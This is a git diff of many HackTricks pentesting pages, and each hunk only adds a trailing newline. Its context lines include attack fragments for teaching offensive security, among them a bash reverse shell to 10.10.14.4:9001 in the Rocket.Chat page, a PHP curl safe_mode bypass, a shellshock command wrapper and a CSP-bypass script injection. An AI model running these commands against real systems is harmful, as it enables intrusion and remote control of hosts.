b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md index 5cb662908..7adc871ce 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md @@ -17,3 +17,4 @@ var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md index aa70024ef..21a0cd442 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md @@ -228,3 +228,4 @@ function pwn($cmd) { ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md index 79b31f733..744ad40d4 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md @@ -432,3 +432,4 @@ You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/n You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.** {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md index 13518fedc..abcc76274 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md @@ -74,3 +74,4 @@ exit {{#endtabs}} {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md index dca396c9d..6f43bff0b 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md @@ -31,3 +31,4 @@ echo "
CMD: ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md index 51516c547..ff9c29bd0 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md @@ -17,3 +17,4 @@ while (!feof($a)) ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md index 3ef69f920..e84243199 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md @@ -132,3 +132,4 @@ echo "[-] Write failed. Exiting\n"; ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md index 8c4fc4502..fcb701f6f 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md @@ -41,3 +41,4 @@ echo $MyBoot_ioncube; ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md index a2726fa7e..ddbb9901a 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md @@ -30,3 +30,4 @@ echo shellshock($_REQUEST["cmd"]); ``` {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/prestashop.md b/src/network-services-pentesting/pentesting-web/prestashop.md index 512b3de85..cb44632b5 100644 --- a/src/network-services-pentesting/pentesting-web/prestashop.md +++ b/src/network-services-pentesting/pentesting-web/prestashop.md @@ -8,3 +8,4 @@ - _**(RCE) PSUploadModule(); - Upload a custom Module:**_ Upload a Persistent Module (backdoor) to PrestaShop. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/put-method-webdav.md b/src/network-services-pentesting/pentesting-web/put-method-webdav.md index d932d9039..704e0f89a 100644 --- a/src/network-services-pentesting/pentesting-web/put-method-webdav.md +++ b/src/network-services-pentesting/pentesting-web/put-method-webdav.md @@ -122,3 +122,4 @@ Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&u Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %} + diff --git a/src/network-services-pentesting/pentesting-web/python.md b/src/network-services-pentesting/pentesting-web/python.md index 134b968d8..5de1fc14c 100644 --- a/src/network-services-pentesting/pentesting-web/python.md +++ b/src/network-services-pentesting/pentesting-web/python.md @@ -25,3 +25,4 @@ test a possible **code execution**, using the function _str()_: {{#endref}} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/rocket-chat.md b/src/network-services-pentesting/pentesting-web/rocket-chat.md index d2f5badb9..f36330bd3 100644 --- a/src/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/src/network-services-pentesting/pentesting-web/rocket-chat.md @@ -43,3 +43,4 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/special-http-headers.md b/src/network-services-pentesting/pentesting-web/special-http-headers.md index 44ab9002f..4a341b07f 100644 --- a/src/network-services-pentesting/pentesting-web/special-http-headers.md +++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md @@ -200,3 +200,4 @@ Strict-Transport-Security: max-age=3153600 - [https://web.dev/articles/security-headers](https://web.dev/articles/security-headers) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md b/src/network-services-pentesting/pentesting-web/spring-actuators.md index 9b2ac57a7..a814cc658 100644 --- a/src/network-services-pentesting/pentesting-web/spring-actuators.md +++ b/src/network-services-pentesting/pentesting-web/spring-actuators.md @@ -64,3 +64,4 @@ ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md index f53bb8e2e..a4fdaa471 100644 --- a/src/network-services-pentesting/pentesting-web/symphony.md +++ b/src/network-services-pentesting/pentesting-web/symphony.md @@ -9,3 +9,4 @@ Take a look to the following posts: - [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/tomcat/README.md b/src/network-services-pentesting/pentesting-web/tomcat/README.md index 93a610cf6..ccdd9dbf0 100644 --- a/src/network-services-pentesting/pentesting-web/tomcat/README.md +++ b/src/network-services-pentesting/pentesting-web/tomcat/README.md @@ -264,3 +264,4 @@ Example: - [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md index cd248ae6d..aae58dc18 100644 --- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md +++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md @@ -141,3 +141,4 @@ Find more info about how to do this in the [original article](https://scrapeops. - [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md index cefa6cb2f..e432b0876 100644 --- a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md +++ b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md @@ -25,3 +25,4 @@ If you find valid credentials, you can use more metasploit scanner modules to ob {% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md index 802a921f4..4120aea3f 100644 --- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md +++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md @@ -69,3 +69,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md index fb3bf4272..9818aaad7 100644 --- a/src/network-services-pentesting/pentesting-web/werkzeug.md +++ b/src/network-services-pentesting/pentesting-web/werkzeug.md @@ -187,3 +187,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 6ecc87837..d3674c9f2 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -459,3 +459,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/2fa-bypass.md b/src/pentesting-web/2fa-bypass.md index 93c9c7319..d0859f8ff 100644 --- a/src/pentesting-web/2fa-bypass.md +++ b/src/pentesting-web/2fa-bypass.md @@ -129,3 +129,4 @@ In case the OTP is created based on data the user already has or that is sending P {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/abusing-hop-by-hop-headers.md b/src/pentesting-web/abusing-hop-by-hop-headers.md index 0eea0247f..7ec894e4d 100644 --- a/src/pentesting-web/abusing-hop-by-hop-headers.md +++ b/src/pentesting-web/abusing-hop-by-hop-headers.md @@ -52,3 +52,4 @@ If a cache server incorrectly caches content based on hop-by-hop headers, an att {% embed url="https://www.rootedcon.com/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md index afcc8caeb..60749e048 100644 --- a/src/pentesting-web/account-takeover.md +++ b/src/pentesting-web/account-takeover.md @@ -122,3 +122,4 @@ With the new login, although different cookies might be generated the old ones b - [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea) {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md index 17934435f..998ebd4e2 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md @@ -755,3 +755,4 @@ Project Neto is a Python 3 package conceived to analyse and unravel hidden featu - [https://gist.github.com/LongJohnCoder/9ddf5735df3a4f2e9559665fb864eac0](https://gist.github.com/LongJohnCoder/9ddf5735df3a4f2e9559665fb864eac0) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md index b61dc5f64..849cdb7a1 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md @@ -99,3 +99,4 @@ browext-xss-example.md - [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md index 5be202b81..2021e3d7d 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md @@ -111,3 +111,4 @@ However, tightening security measures often results in decreased flexibility and - [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md index 25857a893..8ac44003f 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md @@ -116,3 +116,4 @@ Notably, the **`/html/bookmarks.html`** page is prone to framing, thus vulnerabl - [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/bypass-payment-process.md b/src/pentesting-web/bypass-payment-process.md index be491fd56..3f762a4e2 100644 --- a/src/pentesting-web/bypass-payment-process.md +++ b/src/pentesting-web/bypass-payment-process.md @@ -39,3 +39,4 @@ If you encounter a parameter that contains a URL, especially one following the p 2. **Modify Responses**: Attempt to modify the responses before they are processed by the browser or the application to simulate a successful transaction scenario. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md index 01d4ab9a6..38d5e764f 100644 --- a/src/pentesting-web/cache-deception/README.md +++ b/src/pentesting-web/cache-deception/README.md @@ -255,3 +255,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %} {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md index 3c04cadff..9002e1464 100644 --- a/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md +++ b/src/pentesting-web/cache-deception/cache-poisoning-to-dos.md @@ -143,3 +143,4 @@ Cache: hit - [https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------](https://youst.in/posts/cache-poisoning-at-scale/?source=post_page-----3a829f221f52--------------------------------) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md index b4a513407..a3b1464f1 100644 --- a/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md +++ b/src/pentesting-web/cache-deception/cache-poisoning-via-url-discrepancies.md @@ -50,3 +50,4 @@ Several cache servers will always cache a response if it's identified as static. - **Static files:** Some specific files are always cached like `/robots.txt`, `/favicon.ico`, and `/index.html`. Which can be abused like `/home/..%2Frobots.txt` where the cace might store `/robots.txt` and the origin server respond to `/home`. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/captcha-bypass.md b/src/pentesting-web/captcha-bypass.md index dea1b1bfe..24ea34adf 100644 --- a/src/pentesting-web/captcha-bypass.md +++ b/src/pentesting-web/captcha-bypass.md @@ -35,3 +35,4 @@ To **bypass** the captcha during **server testing** and automate user input func {% embed url="https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/clickjacking.md b/src/pentesting-web/clickjacking.md index a7b3a4a03..d0a3701a4 100644 --- a/src/pentesting-web/clickjacking.md +++ b/src/pentesting-web/clickjacking.md @@ -218,3 +218,4 @@ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=clickjacking" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/client-side-path-traversal.md b/src/pentesting-web/client-side-path-traversal.md index 415d7f174..2f87963d9 100644 --- a/src/pentesting-web/client-side-path-traversal.md +++ b/src/pentesting-web/client-side-path-traversal.md @@ -14,3 +14,4 @@ A client side path traversal occurs when you can **manipulate the path of a URL* - Check [**this tutorial**](https://blog.doyensec.com/2024/12/03/cspt-with-eval-villain.html) on how to use the browser extension in the playground. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/client-side-template-injection-csti.md b/src/pentesting-web/client-side-template-injection-csti.md index e6db1431f..0c38bef5d 100644 --- a/src/pentesting-web/client-side-template-injection-csti.md +++ b/src/pentesting-web/client-side-template-injection-csti.md @@ -97,3 +97,4 @@ Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and {% embed url="https://academy.8ksec.io/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index d027593bb..3ab372b58 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -155,3 +155,4 @@ powershell C:**2\n??e*d.*? # notepad **Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} + diff --git a/src/pentesting-web/content-security-policy-csp-bypass/README.md b/src/pentesting-web/content-security-policy-csp-bypass/README.md index 63fcc0a1b..118050c61 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md @@ -861,3 +861,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md index 420ae12f5..d7676b27a 100644 --- a/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md +++ b/src/pentesting-web/content-security-policy-csp-bypass/csp-bypass-self-+-unsafe-inline-with-iframes.md @@ -64,3 +64,4 @@ window.frames[0].document.head.appendChild(script) - [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/cors-bypass.md b/src/pentesting-web/cors-bypass.md index fe8497e51..5e40305c9 100644 --- a/src/pentesting-web/cors-bypass.md +++ b/src/pentesting-web/cors-bypass.md @@ -449,3 +449,4 @@ You can find more information about the previous bypass techniques and how to us {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/crlf-0d-0a.md b/src/pentesting-web/crlf-0d-0a.md index 0201fa986..8c26a18c7 100644 --- a/src/pentesting-web/crlf-0d-0a.md +++ b/src/pentesting-web/crlf-0d-0a.md @@ -228,3 +228,4 @@ To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Inj {% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/csrf-cross-site-request-forgery.md b/src/pentesting-web/csrf-cross-site-request-forgery.md index 6fc375820..d7301c04e 100644 --- a/src/pentesting-web/csrf-cross-site-request-forgery.md +++ b/src/pentesting-web/csrf-cross-site-request-forgery.md @@ -717,3 +717,4 @@ Stay informed with the newest bug bounties launching and crucial platform update **Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md index fd5a97a35..14a4525bc 100644 --- a/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md +++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -261,3 +261,4 @@ XS-Search are oriented to **exfiltrate cross-origin information** abusing **side - [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md index 1aff80c15..668320c6b 100644 --- a/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md +++ b/src/pentesting-web/dangling-markup-html-scriptless-injection/ss-leaks.md @@ -5,3 +5,4 @@ **Check the post [https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks](https://infosec.zeyu2001.com/2023/from-xs-leaks-to-ss-leaks)** {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/dependency-confusion.md b/src/pentesting-web/dependency-confusion.md index 0dc51583d..91508ed6f 100644 --- a/src/pentesting-web/dependency-confusion.md +++ b/src/pentesting-web/dependency-confusion.md @@ -49,3 +49,4 @@ In the [**original post about dependency confusion**](https://medium.com/@alex.b {% embed url="https://websec.nl/" %} {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index a0a2c6e24..39fcdc5b7 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md @@ -977,3 +977,4 @@ Moreover, it was found that with the previous technique a folder is also created Check for more details in the [**original post**](https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/?utm_source=pocket_shared). {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md index 5e359543e..6048b9e85 100644 --- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md +++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md @@ -195,3 +195,4 @@ namespace DeserializationTests ``` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md index 83d1e1cd6..c86946b86 100644 --- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md +++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md @@ -87,3 +87,4 @@ public class TestDeserialization { As you can see in this very basic example, the "vulnerability" here appears because the **readObject** function is **calling other vulnerable functions**. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md index ee42fce01..d3716eac1 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md @@ -3,3 +3,4 @@ **Check the amazing post from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md index 8f0247fd5..5f372789e 100644 --- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md +++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md @@ -220,3 +220,4 @@ Check for [further information here]( To identify these vulnerabilities, the 'connection-state probe' feature in HTTP Request Smuggler can be utilized. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/http-response-smuggling-desync.md b/src/pentesting-web/http-response-smuggling-desync.md index 7d450f06e..13fc66a34 100644 --- a/src/pentesting-web/http-response-smuggling-desync.md +++ b/src/pentesting-web/http-response-smuggling-desync.md @@ -130,3 +130,4 @@ However, note how the **reflected data had a size according to the Content-Lengt Therefore, the **next request of the second victim** will be **receiving** as **response something completely crafted by the attacker**. As the response is completely crafted by the attacker he can also **make the proxy cache the response**. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md index 306756f71..2e51c2813 100644 --- a/src/pentesting-web/idor.md +++ b/src/pentesting-web/idor.md @@ -3,3 +3,4 @@ **Check the post: [https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)** {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/iframe-traps.md b/src/pentesting-web/iframe-traps.md index 9795cdb66..c347765b6 100644 --- a/src/pentesting-web/iframe-traps.md +++ b/src/pentesting-web/iframe-traps.md @@ -21,3 +21,4 @@ Moreover, it's possible to use listeners to steal sensitive information, not onl Ofc, the main limitations are that a **victim closing the tab or putting another URL in the browser will escape the iframe**. Another 